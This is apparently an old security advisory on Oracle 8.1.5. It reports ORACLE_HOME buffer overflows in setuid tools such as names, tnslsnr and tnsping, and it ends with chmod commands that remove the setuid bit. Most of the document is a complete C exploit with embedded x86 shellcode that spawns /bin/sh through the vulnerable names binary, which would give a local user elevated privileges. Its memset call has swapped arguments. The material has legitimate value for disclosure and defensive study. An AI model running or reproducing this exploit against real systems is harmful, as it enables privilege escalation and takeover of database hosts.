COMMAND
Oracle
SYSTEMS AFFECTED
Oracle 8.1.5
PROBLEM
Following is based on a Hackerslab bug_paper. There are two
security vulnerability in Oracle.
1. It is possible to create a buffer overflow vulnerability using
"ORACLE_HOME", one of the environmental value of Oracle.
Oracle applications that are vulnerable to buffer overflow are
as follow:
- names
- namesctl
- onrsd
- osslogin
- tnslsnr
- tnsping
- trcasst
- trcroute
Thease applications allow an attacker to excute a buffer
overflow exploit.
2. When a user excutes one of Oracle applications such as names,
oracle or tnslsnr, following log files are created.
names
======
-rw-rw-r-- 1 oracle dba 0 Oct 20 01:45 ckpcch.ora
-rw-rw-r-- 1 oracle dba 428 Oct 20 01:45 ckpreg.ora
-rw-rw-r-- 1 oracle dba 950 Oct 20 01:45 names.log
oracle
======
-rw-rw---- 1 oracle dba 616 Oct 20 05:14 ora_[running pid].trc
tnslsnr
=======
-rw-rw-r-- 1 oracle dba 2182176 Oct 20 2000 listener.log
The code:
/*
Oracle 8.1.5 exploit
-by loveyou
offset value : -500 ~ +500
*/
#include <stdio.h>
#include <stdlib.h>
#define BUFFER 800
#define NOP 0x90
#define PATH "/hackerslab/loveyou/oracle/8.1.5/bin/names"
char shellcode[] =
/* - K2 - */
/* main: */
"\xeb\x1d" /* jmp callz */
/* start: */
"\x5e" /* popl %esi */
"\x29\xc0" /* subl %eax, %eax */
"\x88\x46\x07" /* movb %al, 0x07(%esi) */
"\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */
"\x89\x76\x08" /* movl %esi, 0x08(%esi) */
"\xb0\x0b" /* movb $0x0b, %al */
"\x87\xf3" /* xchgl %esi, %ebx */
"\x8d\x4b\x08" /* leal 0x08(%ebx), %ecx */
"\x8d\x53\x0c" /* leal 0x0c(%ebx), %edx */
"\xcd\x80" /* int $0x80 */
"\x29\xc0" /* subl %eax, %eax */
"\x40" /* incl %eax */
"\xcd\x80" /* int $0x80 */
/* callz: */
"\xe8\xde\xff\xff\xff" /* call start */
"/bin/sh";
unsigned long getesp(void)
{
__asm__("movl %esp,%eax");
}
int main(int argc, char *argv[])
{
char *buff, *ptr,binary[120];
long *addr_ptr, addr;
int bsize=BUFFER;
int i,offset;
offset = 0 ;
if ( argc > 1 ) offset = atoi(argv[1]);
buff = malloc(bsize);
addr = getesp() - 5933 - offset;
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
memset(buff,bsize/2,NOP);
ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
setenv("ORACLE_HOME",buff,1);
printf("[ offset:%d buffer=%d ret:0x%x ]\n",
offset,strlen(buff),addr);
system(PATH);
}
SOLUTION
Contact your vendor for a patch or close setuid permission.
# su - oracle
$ cd /oracle_8.1.5_install_directory/bin
$ chmod a-s names namesctl onrsd osslogin tnslsnr tnsping trcasst trcroute